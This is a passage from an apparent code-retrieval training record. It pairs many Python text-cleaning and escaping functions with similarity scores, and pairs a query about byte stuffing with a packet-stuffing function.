"def text_cleaning(self, text): # pylint: disable=no-self-use\n text = text.encode(\"ascii\", \"ignore\").decode(\"ascii\", \"ignore\")\n text = re.sub(r'[^\\x00-\\x7F]', '', text)\n text = text.replace(\"\\n\", \"\")\n text = text.replace(\"\\'\", \"'\")\n text = text.replace(\"\\\\\\\"\", '\\\"')\n text = text.replace(\"&\", \"&\")\n text = text.replace(\""\", '\\\"')\n text = text.replace(\" \", ' ')\n text = text.strip().lstrip().rstrip()\n desc_text = ' '.join(text.split())\n return desc_text",
"def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")",
"def _hidden_in_unicode(self, txt):",
"def remove_special_tags(text):\n clean = re.compile('{.*?}')\n return re.sub(clean, '', text)",
"def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', text)\n\n return text",
"def processword(word):\n word = word.lower()\n word = word.strip('()?,!`.-:\\\"\\n \\'')\n return word",
"def clean(str):\n str = str.replace(u\"“\",u\"``\")\n str = str.replace(u\"”\",u\"''\")\n str = str.replace(u' \"',u\" ``\")\n str = str.replace(u'\"',u\"''\")\n str = str.replace(u'fi',u\"fi\")\n str = str.replace(u'fl',u\"fl\")\n str = str.replace(u'’',u\"'\")\n str = str.replace(u'–',u\"---\")\n str = str.replace(u'&',u\"\\\\&\")\n str = str.replace(u'#',u\"\\\\#\")\n str = str.replace(u'_',u\"\\\\_\")\n \n return str",
"def test_special_characters(self):\n testString = sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')",
"def handle_special_symbols(text: str\n ) -> str:\n valid_special_symbols = {' ', '_'}\n\n def criteria(c: str\n ) -> str:\n return c if c.isalnum() or c in valid_special_symbols else ' '\n\n return ''.join(criteria(c) for c in list(text))",
"def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext",
"def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext",
"def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext",
"def _cleanse(text):\n return ''.join([character for character in text\n if character.isalnum()]).lower()",
"def sanitize(instring):\r\n return instring.encode('ascii','replace')",
"def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line",
"def _strip_invalid_characters(self: object) -> None:\n for current_invalid_character in Episode._invalid_characters:\n self.episode_broadcast = self.episode_broadcast.replace(current_invalid_character, \" \").strip()\n self.episode_inspectors = self.episode_inspectors.replace(current_invalid_character, \" \").strip()\n self.episode_name = self.episode_name.replace(current_invalid_character, \" \").strip()\n self.episode_sequence = self.episode_sequence.replace(current_invalid_character, \"-\").strip()",
"def clean(tweet):\n #Separates the contractions and the punctuation\n\n\n tweet = re.sub(\"[!#.,\\\"]\", \"\", tweet).replace(\"<user>\", \"\")\n tweet = re.sub(\"[!#.,\\\"]\", \"\", tweet).replace(\"<url>\", \"\")\n tweet = correct_spell(tweet)\n return tweet.strip().lower()",
"def wipe_bad_chars(filename):\n return multi_replace(filename, {'(': '', ' ': '_', ')': '', '/': '_'})",
"def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt",
"def pre_process(text: str) -> str:\n text = text.replace('--', '-')\n space_right = '!?:;,.-()*+-/<=>@^_'\n space_both = '-()*+-/<=>@^_'\n\n for punct in space_right:\n text = text.replace(punct, punct + ' ')\n for punct in space_both:\n text = text.replace(punct, ' ' + punct + ' ')\n\n # remove extra space\n text = re.sub(r' +', ' ', text)\n return text",
"def _removeDiacritics(self, text):\n norm_txt = unicodedata.normalize('NFD', text)\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n # remove accents and other diacritics, replace spaces with \"_\" because identifiers can't have spaces\n no_spaces = unicodedata.normalize(\n 'NFC', shaved).lower().replace(\" \", \"_\")\n final_text = no_spaces\n # only allow [a-z], [0-9] and _\n p = re.compile('[a-z0-9_]+')\n for i in range(0, len(no_spaces)):\n if not (p.match(no_spaces[i])):\n final_text = final_text[:i] + '_' + final_text[i+1:]\n # i the first char is not a-z then replaceit (all identifiers must start with a letter)\n p2 = re.compile('[a-z]+')\n if not p2.match(final_text[0]):\n final_text = 'a' + final_text[1:]\n return final_text",
"def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])",
"def sanitize_text(text: str) -> str:\n for r in [RE_NOISE, RE_EMAIL, RE_REFERENCE]:\n text = r.sub(\"\", text)\n return text",
"def basic_cleaning2(string):\n\n string = string.lower()\n string = re.sub('[0-9\\(\\)\\!\\^\\%\\$\\'\\\"\\.;,-\\?\\{\\}\\[\\]\\\\/]', ' ', string)\n string = re.sub(' +', ' ', string)\n return string",
"def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text",
"def clean_venue(venue):\n\n return venue.lower().strip('?:!.,;- ')",
"def clean_text(text):\n text = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", text)\n text = re.sub(r\"\\'s\", \" \\'s\", text)\n text = re.sub(r\"\\'ve\", \" \\'ve\", text)\n text = re.sub(r\"n\\'t\", \" n\\'t\", text)\n text = re.sub(r\"\\'re\", \" \\'re\", text)\n text = re.sub(r\"\\'d\", \" \\'d\", text)\n text = re.sub(r\"\\'ll\", \" \\'ll\", text)\n text = re.sub(r\",\", \" , \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\(\", \" \\( \", text)\n text = re.sub(r\"\\)\", \" \\) \", text)\n text = re.sub(r\"\\?\", \" \\? \", text)\n text = re.sub(r\"\\s{2,}\", \" \", text)\n return text.strip().lower()",
"def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text",
"def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text",
"def clean_tweet(tweet):\n\n pattern = r'http\\S+|pic.\\S+|@[a-zA-Z0-9_]+|#[a-zA-Z0-9_]+|[‘’“”’–—…]|\\xa0'\n return re.sub(pattern, '', tweet)"
] | [
"0.812195",
"0.7796951",
"0.7721134",
"0.7502092",
"0.74759036",
"0.74687314",
"0.74635375",
"0.74607944",
"0.74368715",
"0.73807883",
"0.7368768",
"0.733261",
"0.73250467",
"0.7321472",
"0.7290007",
"0.7253354",
"0.72486293",
"0.7246413",
"0.72234553",
"0.72016734",
"0.70941263",
"0.7065173",
"0.7057635",
"0.7056931",
"0.70357066",
"0.7034848",
"0.7020548",
"0.70183563",
"0.69993615",
"0.6994655",
"0.6984761",
"0.6976117",
"0.6970078",
"0.6970069",
"0.6968109",
"0.6936857",
"0.69045323",
"0.68977875",
"0.6859235",
"0.6854273",
"0.6852882",
"0.68309134",
"0.6820921",
"0.6805765",
"0.6791286",
"0.67671776",
"0.67525107",
"0.6742554",
"0.67384493",
"0.67325366",
"0.6713737",
"0.670871",
"0.6706358",
"0.669645",
"0.6695137",
"0.6693032",
"0.6688467",
"0.66813964",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66633904",
"0.6652145",
"0.66432977",
"0.6626633",
"0.66052306",
"0.6602152",
"0.6598754",
"0.65890324",
"0.65762454",
"0.6566943",
"0.65574616",
"0.6556249",
"0.6548358",
"0.6546717",
"0.6531763",
"0.6522631",
"0.65204114",
"0.65204114",
"0.6509194",
"0.64936453",
"0.64935166",
"0.64908653",
"0.6488617",
"0.64844275",
"0.6474326",
"0.6471118",
"0.6470705",
"0.6466766",
"0.6465116",
"0.64607704",
"0.6452783",
"0.64515543",
"0.64477974",
"0.64476967",
"0.6445775",
"0.6445775",
"0.6440607"
] | 0.0 | -1 |
inserts the special characters for stuffing | def __packet_stuff(self, data):
stuffed = bytearray()
stuffed.append(0x7e)
for count in data:
if count >= 0x7d and count <= 0x7f:
stuffed.append(0x7d)
stuffed.append(count - 0x7d)
else:
stuffed.append(count)
stuffed.append(0x7f)
return(stuffed) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def replace_special(text):\r\n text = text.replace('\\r\\n', ' ')\r\n text = text.replace('\\n', ' ')\r\n text = text.replace('``', \"''\")\r\n text = text.replace('`', \"'\")\r\n text = text.replace('“', '\"')\r\n text = text.replace('”', '\"')\r\n text = text.replace('’', \"'\")\r\n text = text.replace('‘', \"'\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('–', \"-\")\r\n text = text.replace('\\\"', '\"')\r\n text = text.replace(\"\\'\", \"'\")\r\n return text",
"def replace_special_chars(self, word):\n try:\n if (self.lang==\"tr\"):\n word = re.sub(u\"\\^db\", u\"+db\", word)\n word = re.sub(u\"\\^\", u\"¬\", word)\n word = re.sub(u\"\\$\", u\"£\", word)\n except UnicodeDecodeError:\n word = ''\n return word",
"def _escapeSpecialCharacters(text):\n text.replace('\\\\', '\\\\\\\\')\n escape = ['~', '#', '&', '%', '_']\n for c in escape:\n text = text.replace(c, '\\\\' + c )\n return text",
"def _escape(self,text):\n\t\tif not text: return \"_\" # escape empty string\n\t\ttext = text.replace(\"_\",\"__\") # escape underscores\n\t\ttext = text.replace(\" \",\"_\") # escape spaces\n\t\ttext = text.replace(\"-\",\"--\") # escape dashes\n\t\ttext = text.replace(\"''\",'\"') # escape double quote\n\t\ttext = text.replace(\"?\",\"~q\") # escape question marks\n\t\ttext = text.replace(\"%\",\"~p\") # escape question marks\n\t\ttext = text.replace(\"#\",\"~h\") # escape question marks\n\t\ttext = text.replace(\"/\",\"~s\") # escape question marks\n\t\treturn text",
"def insert_special_char(phrase_words):\n SPECIAL = [\n [\"~\", \"!\", \"#\", \"$\", \"%\", \"^\"],\n [\"&\", \"*\", \"(\", \")\", \"-\", \"=\"],\n [\"+\", \"[\", \"]\", \"\\\\\", \"{\", \"}\"],\n [\":\", \";\", \"\\\"\", \"\\'\", \"<\", \">\"],\n [\"?\", \"/\", \"0\", \"1\", \"2\", \"3\"],\n [\"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]]\n n = len(phrase_words)\n\n rand_i = secrets.randbelow(n)\n rand_w = phrase_words[rand_i] # Random word\n rand_w_i = secrets.randbelow(len(rand_w)) # Random character\n\n rand_row = secrets.choice(SPECIAL)\n rand_special = secrets.choice(rand_row)\n\n # Replace char and word\n rand_w = rand_w[rand_w_i] + rand_special + rand_w[:rand_w_i+1]\n phrase_words[rand_i] = rand_w",
"def handle_special_symbols(text: str\n ) -> str:\n valid_special_symbols = {' ', '_'}\n\n def criteria(c: str\n ) -> str:\n return c if c.isalnum() or c in valid_special_symbols else ' '\n\n return ''.join(criteria(c) for c in list(text))",
"def escapeEncode(s: unicode) -> unicode:\n ...",
"def test_special_characters(self):\n testString = sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')",
"def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text",
"def encode(self, text):",
"def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)",
"def escape(self, text, escape_chars):\n _bs = \"\\\\\"\n # backslash is always escaped\n text = text.replace(_bs, _bs * 2)\n for _el in escape_chars:\n assert _el != _bs, \"Backslash has been already escaped\"\n text = text.replace(_el, _bs + _el)\n return text",
"def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)",
"def html_escape(text):\r\n\treturn \"\".join(html_escape_table.get(c,c) for c in text)",
"def encode(self, text):\n # taken from htmlcss1 writer\n # @@@ A codec to do these and all other HTML entities would be nice.\n text = text.replace(\"&\", \"&\")\n text = text.replace(\"<\", \"<\")\n text = text.replace('\"', \""\")\n text = text.replace(\">\", \">\")\n text = text.replace(\"@\", \"@\") # may thwart some address harvesters\n return text",
"def escape(text):\n return text_type(text).replace('&', '&').replace('<', '<').replace('>', '>')",
"def resolve_special_chars(location):\n matches = re.findall(\"(u0[\\w+]{3}|')\", location)\n if matches != []:\n for special_char in matches:\n if special_char != \"'\":\n tmp_char = \"\\\\\" + special_char\n location = location.replace(\n special_char,\n tmp_char.encode().decode('unicode-escape'))\n else:\n location = location.replace(special_char, \"'\")\n return location",
"def html_escape(text):\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def html_escape(text):\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def escape_meme_text(text):\n replacements = {\n \" \": \"_\",\n \"?\": \"~q\",\n \"%\": \"~p\",\n \"#\": \"~h\",\n \"/\": \"~s\",\n \"''\": \"\\\"\",\n }\n\n for r in replacements.keys():\n text = text.replace(r, replacements[r])\n\n return text",
"def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence",
"def escape(self,s):\n\t\ts = s.replace('&', '&').replace('<', '<').replace('>', '>')\n\t\ts = s.replace('\"','').replace(\"'\",\"\")\n\t\treturn ''.join([c for c in s if ord(c) > 0x1F])",
"def encodeSpecialChars(self, input):\n ret = libxml2mod.xmlEncodeSpecialChars(self._o, input)\n return ret",
"def escape(self):\n pass",
"def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text",
"def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text",
"def escape(text):\n return text.replace('&', '&'). \\\n replace('<', '<'). \\\n replace('>', '>').replace('\"', '"'). \\\n replace(\"'\", ''')",
"def encodeText(text):\r\n#\treturn repr( quote_plus(text.replace(\"'\", '\"')) )\r\n\ttry:\r\n\t\treturn repr( quote_plus(text.replace(\"'\", '\"').encode('utf-8')) )\r\n\texcept:\r\n\t\tlogError(\"encodeText()\")\r\n\treturn repr(text.replace(\"'\", '\"'))",
"def encode(self, text):\n if self.verbatim:\n return text\n # compile the regexps once. do it here so one can see them.\n #\n # first the braces.\n if not self.__dict__.has_key('encode_re_braces'):\n self.encode_re_braces = re.compile(r'([{}])')\n text = self.encode_re_braces.sub(r'{\\\\\\1}',text)\n if not self.__dict__.has_key('encode_re_bslash'):\n # find backslash: except in the form '{\\{}' or '{\\}}'.\n self.encode_re_bslash = re.compile(r'(?<!{)(\\\\)(?![{}]})')\n # then the backslash: except in the form from line above:\n # either '{\\{}' or '{\\}}'.\n text = self.encode_re_bslash.sub(r'{\\\\textbackslash}', text)\n\n # then dollar\n text = text.replace(\"$\", '{\\\\$}')\n # then all that needs math mode\n text = text.replace(\"<\", '{$<$}')\n text = text.replace(\">\", '{$>$}')\n # then\n text = text.replace(\"&\", '{\\\\&}')\n text = text.replace(\"_\", '{\\\\_}')\n # the ^:\n # * verb|^| does not work in mbox.\n # * mathmode has wedge. hat{~} would also work.\n text = text.replace(\"^\", '{\\\\ensuremath{^\\\\wedge}}')\n text = text.replace(\"%\", '{\\\\%}')\n text = text.replace(\"#\", '{\\\\#}')\n text = text.replace(\"~\", '{\\\\~{}}')\n if self.insert_newline:\n # HACK: insert a blank before the newline, to avoid \n # ! LaTeX Error: There's no line here to end.\n text = text.replace(\"\\n\", '~\\\\\\\\\\n')\n elif self.mbox_newline:\n text = text.replace(\"\\n\", '}\\\\\\\\\\n\\\\mbox{')\n if self.insert_none_breaking_blanks:\n text = text.replace(' ', '~')\n # unicode !!! \n text = text.replace(u'\\u2020', '{$\\\\dagger$}')\n return text",
"def encode(self, text):\n if self.verbatim:\n return text\n # compile the regexps once. do it here so one can see them.\n #\n # first the braces.\n if not self.__dict__.has_key('encode_re_braces'):\n self.encode_re_braces = re.compile(r'([{}])')\n text = self.encode_re_braces.sub(r'{\\\\\\1}',text)\n if not self.__dict__.has_key('encode_re_bslash'):\n # find backslash: except in the form '{\\{}' or '{\\}}'.\n self.encode_re_bslash = re.compile(r'(?<!{)(\\\\)(?![{}]})')\n # then the backslash: except in the form from line above:\n # either '{\\{}' or '{\\}}'.\n text = self.encode_re_bslash.sub(r'{\\\\textbackslash}', text)\n\n # then dollar\n text = text.replace(\"$\", '{\\\\$}')\n if not ( self.literal_block or self.literal or self.mathmode ):\n # the vertical bar: in mathmode |,\\vert or \\mid\n # in textmode \\textbar\n text = text.replace(\"|\", '{\\\\textbar}')\n text = text.replace(\"<\", '{\\\\textless}')\n text = text.replace(\">\", '{\\\\textgreater}')\n # then\n text = text.replace(\"&\", '{\\\\&}')\n # the ^:\n # * verb|^| does not work in mbox.\n # * mathmode has wedge. hat{~} would also work.\n # text = text.replace(\"^\", '{\\\\ensuremath{^\\\\wedge}}')\n text = text.replace(\"^\", '{\\\\textasciicircum}')\n text = text.replace(\"%\", '{\\\\%}')\n text = text.replace(\"#\", '{\\\\#}')\n text = text.replace(\"~\", '{\\\\textasciitilde}')\n # Separate compound characters, e.g. \"--\" to \"-{}-\". (The\n # actual separation is done later; see below.)\n separate_chars = '-'\n if self.literal_block or self.literal:\n # In monospace-font, we also separate \",,\", \"``\" and \"''\"\n # and some other characters which can't occur in\n # non-literal text.\n separate_chars += ',`\\'\"<>'\n # pdflatex does not produce doublequotes for ngerman.\n text = self.babel.double_quotes_in_tt(text)\n if self.font_encoding == 'OT1':\n # We're using OT1 font-encoding and have to replace\n # underscore by underlined blank, because this has\n # correct width.\n text = text.replace('_', '{\\\\underline{ }}')\n # And the tt-backslash doesn't work in OT1, so we use\n # a mirrored slash.\n text = text.replace('\\\\textbackslash', '\\\\reflectbox{/}')\n else:\n text = text.replace('_', '{\\\\_}')\n else:\n text = self.babel.quote_quotes(text)\n text = text.replace(\"_\", '{\\\\_}')\n for char in separate_chars * 2:\n # Do it twice (\"* 2\") becaues otherwise we would replace\n # \"---\" by \"-{}--\".\n text = text.replace(char + char, char + '{}' + char)\n if self.insert_newline or self.literal_block:\n # Insert a blank before the newline, to avoid\n # ! LaTeX Error: There's no line here to end.\n text = text.replace(\"\\n\", '~\\\\\\\\\\n')\n elif self.mbox_newline:\n if self.literal_block:\n closings = \"}\" * len(self.literal_block_stack)\n openings = \"\".join(self.literal_block_stack)\n else:\n closings = \"\"\n openings = \"\"\n text = text.replace(\"\\n\", \"%s}\\\\\\\\\\n\\\\mbox{%s\" % (closings,openings))\n # lines starting with \"[\" give errors.\n text = text.replace('[', '{[}')\n if self.insert_none_breaking_blanks:\n text = text.replace(' ', '~')\n if self.latex_encoding != 'utf8':\n text = self.unicode_to_latex(text)\n return text",
"def htmlencode(s):\n \ts = s.replace(\"&\", \"&\")\n\ts = s.replace(\"<\", \"<\")\n\ts = s.replace(\">\", \">\")\n\ts = s.replace(\"\\\"\",\""\")\n\ts = s.replace(\"'\", \"'\")\n\treturn s",
"def html_escape(text): \n html_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def replace_special_characters_in_list(self, full_list):\n return [n.replace(':','%3A') for n in full_list]",
"def test_escape(self):\n bad_str = '''`~!@#$%^&*()_+-={}[]|\\\\;:'\",./<>?\\n\\r\\t '''\n self.run_escape_case(bad_str)",
"def singleencode(self, word):\n replace = {u'\\u0d15\\u0d4d\\u200d': u'\\u0d7f',\n u'\\u0d23\\u0d4d\\u200d': u'\\u0d7a',\n u'\\u0d28\\u0d4d\\u200d': u'\\u0d7b',\n u'\\u0d30\\u0d4d\\u200d': u'\\u0d7c',\n u'\\u0d32\\u0d4d\\u200d': u'\\u0d7d',\n u'\\u0d33\\u0d4d\\u200d': u'\\u0d7e'}\n for character in replace:\n word = word.replace(character, replace[character])\n return word",
"def replace_char(text):\n\n for ch in ['/', '`', '*', '{', '}', '[', ']', '(', ')', '#', '+', '-', '.', '!', '\\$', ':', '|']:\n text = text.replace(ch, \"_\")\n return text",
"def html_escape(text):\n L=[]\n for c in text:\n L.append(html_escape_table.get(c,c))\n return \"\".join(L)",
"def escape_latex_characters(line):\n line = line.replace('\\\\', '\\\\textbackslash')\n line = line.replace('&', '\\&')\n line = line.replace('%', '\\%')\n line = line.replace('$', '\\$')\n line = line.replace('#', '\\#')\n line = line.replace('_', '\\_')\n line = line.replace('{', '\\{')\n line = line.replace('}', '\\}')\n line = line.replace('~', '\\\\textasciitilde')\n line = line.replace('^', '\\\\textasciicircum')\n line = line.replace('<', '\\\\textless')\n line = line.replace('>', '\\\\textgreater')\n return line",
"def _hidden_in_unicode(self, txt):",
"def quotemeta(text):\n return re.sub(\"(\\W)\", r\"\\\\\\1\", text)",
"def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string",
"def encode(string):\n return string.translate(html_entities)",
"def escape_string(text):\n return escape(text)",
"def escape_django_tags(txt):\n for source, dest in ENTITIES.iteritems():\n txt = txt.replace(source, dest)\n return txt",
"def replace_escaped_characters(data: Text) -> Text:\n return re.sub(r'\\\\(.)', r'\\1', data)",
"def _escape_backticks(text: str, escape_with='\\u200b'):\r\n return text.replace('`', '`'+escape_with)",
"def unicode_escape(unistr):\n import htmlentitydefs\n escaped = \"\"\n\n for char in unistr:\n if ord(char) in htmlentitydefs.codepoint2name:\n name = htmlentitydefs.codepoint2name.get(ord(char))\n entity = htmlentitydefs.name2codepoint.get(name)\n escaped +=\"&#\" + str(entity)\n\n else:\n escaped += char\n\n return escaped",
"def register_all(self):\n # TODO complete this list\n # register special symbols\n self.register(u'\\n\\n', u' \\\\par', encode=False)\n self.register(u'\\n\\n', u'\\\\par', encode=False)\n self.register(u' ', u'\\\\ ', encode=False)\n self.register(u'\\N{EM SPACE}', u'\\\\quad')\n self.register(u'\\N{THIN SPACE}', u' ', decode=False)\n self.register(u'%', u'\\\\%')\n self.register(u'\\N{EN DASH}', u'--')\n self.register(u'\\N{EN DASH}', u'\\\\textendash')\n self.register(u'\\N{EM DASH}', u'---')\n self.register(u'\\N{EM DASH}', u'\\\\textemdash')\n self.register(u'\\N{REPLACEMENT CHARACTER}', u\"????\", decode=False)\n self.register(u'\\N{LEFT SINGLE QUOTATION MARK}', u'`', decode=False)\n self.register(u'\\N{RIGHT SINGLE QUOTATION MARK}', u\"'\", decode=False)\n self.register(u'\\N{LEFT DOUBLE QUOTATION MARK}', u'``')\n self.register(u'\\N{RIGHT DOUBLE QUOTATION MARK}', u\"''\")\n self.register(u'\\N{DOUBLE LOW-9 QUOTATION MARK}', u\",,\")\n self.register(u'\\N{DOUBLE LOW-9 QUOTATION MARK}', u'\\\\glqq',\n encode=False)\n self.register(u'\\N{LEFT-POINTING DOUBLE ANGLE QUOTATION MARK}',\n u'\\\\guillemotleft')\n self.register(u'\\N{RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK}',\n u'\\\\guillemotright')\n self.register(u'\\N{MODIFIER LETTER PRIME}', u\"'\", decode=False)\n self.register(u'\\N{MODIFIER LETTER DOUBLE PRIME}', u\"''\", decode=False)\n self.register(u'\\N{MODIFIER LETTER TURNED COMMA}', u'`', decode=False)\n self.register(u'\\N{MODIFIER LETTER APOSTROPHE}', u\"'\", decode=False)\n self.register(u'\\N{MODIFIER LETTER REVERSED COMMA}', u'`',\n decode=False)\n self.register(u'\\N{DAGGER}', u'\\\\dag')\n self.register(u'\\N{DOUBLE DAGGER}', u'\\\\ddag')\n\n self.register(u'\\\\', u'\\\\textbackslash', encode=False)\n self.register(u'\\\\', u'\\\\backslash', mode='math', encode=False)\n\n self.register(u'\\N{TILDE OPERATOR}', u'\\\\sim', mode='math')\n self.register(u'\\N{MODIFIER LETTER LOW TILDE}',\n u'\\\\texttildelow', package='textcomp')\n self.register(u'\\N{SMALL TILDE}', u'\\\\~{}')\n self.register(u'~', u'\\\\textasciitilde')\n\n self.register(u'\\N{BULLET}', u'\\\\bullet', mode='math')\n self.register(u'\\N{BULLET}', u'\\\\textbullet', package='textcomp')\n self.register(u'\\N{ASTERISK OPERATOR}', u'\\\\ast', mode='math')\n\n self.register(u'\\N{NUMBER SIGN}', u'\\\\#')\n self.register(u'\\N{LOW LINE}', u'\\\\_')\n self.register(u'\\N{AMPERSAND}', u'\\\\&')\n self.register(u'\\N{NO-BREAK SPACE}', u'~')\n self.register(u'\\N{INVERTED EXCLAMATION MARK}', u'!`')\n self.register(u'\\N{CENT SIGN}', u'\\\\not{c}')\n\n self.register(u'\\N{POUND SIGN}', u'\\\\pounds')\n self.register(u'\\N{POUND SIGN}', u'\\\\textsterling', package='textcomp')\n self.register(u'\\N{YEN SIGN}', u'\\\\yen')\n self.register(u'\\N{YEN SIGN}', u'\\\\textyen', package='textcomp')\n\n self.register(u'\\N{SECTION SIGN}', u'\\\\S')\n self.register(u'\\N{DIAERESIS}', u'\\\\\"{}')\n self.register(u'\\N{NOT SIGN}', u'\\\\neg')\n self.register(u'\\N{HYPHEN}', u'-', decode=False)\n self.register(u'\\N{SOFT HYPHEN}', u'\\\\-')\n self.register(u'\\N{MACRON}', u'\\\\={}')\n\n self.register(u'\\N{DEGREE SIGN}', u'^\\\\circ', mode='math')\n self.register(u'\\N{DEGREE SIGN}', u'\\\\textdegree', package='textcomp')\n\n self.register(u'\\N{MINUS SIGN}', u'-', mode='math')\n self.register(u'\\N{PLUS-MINUS SIGN}', u'\\\\pm', mode='math')\n self.register(u'\\N{PLUS-MINUS SIGN}', u'\\\\textpm', package='textcomp')\n\n self.register(u'\\N{SUPERSCRIPT TWO}', u'^2', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT TWO}',\n u'\\\\texttwosuperior',\n package='textcomp')\n\n self.register(u'\\N{SUPERSCRIPT THREE}', u'^3', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT THREE}',\n u'\\\\textthreesuperior',\n package='textcomp')\n\n self.register(u'\\N{ACUTE ACCENT}', u\"\\\\'{}\")\n\n self.register(u'\\N{MICRO SIGN}', u'\\\\mu', mode='math')\n self.register(u'\\N{MICRO SIGN}', u'\\\\micro', package='gensymu')\n\n self.register(u'\\N{PILCROW SIGN}', u'\\\\P')\n\n self.register(u'\\N{MIDDLE DOT}', u'\\\\cdot', mode='math')\n self.register(\n u'\\N{MIDDLE DOT}',\n u'\\\\textperiodcentered',\n package='textcomp')\n\n self.register(u'\\N{CEDILLA}', u'\\\\c{}')\n\n self.register(u'\\N{SUPERSCRIPT ONE}', u'^1', mode='math')\n self.register(\n u'\\N{SUPERSCRIPT ONE}',\n u'\\\\textonesuperior',\n package='textcomp')\n\n self.register(u'\\N{INVERTED QUESTION MARK}', u'?`')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH GRAVE}', u'\\\\`A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH CIRCUMFLEX}', u'\\\\^A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH TILDE}', u'\\\\~A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH DIAERESIS}', u'\\\\\"A')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', u'\\\\AA')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', u'\\\\r A',\n encode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER AE}', u'\\\\AE')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CEDILLA}', u'\\\\c C')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH GRAVE}', u'\\\\`E')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH ACUTE}', u\"\\\\'E\")\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH CIRCUMFLEX}', u'\\\\^E')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH DIAERESIS}', u'\\\\\"E')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH GRAVE}', u'\\\\`I')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH CIRCUMFLEX}', u'\\\\^I')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH DIAERESIS}', u'\\\\\"I')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH TILDE}', u'\\\\~N')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH GRAVE}', u'\\\\`O')\n self.register(u'\\N{LATIN CAPITAL 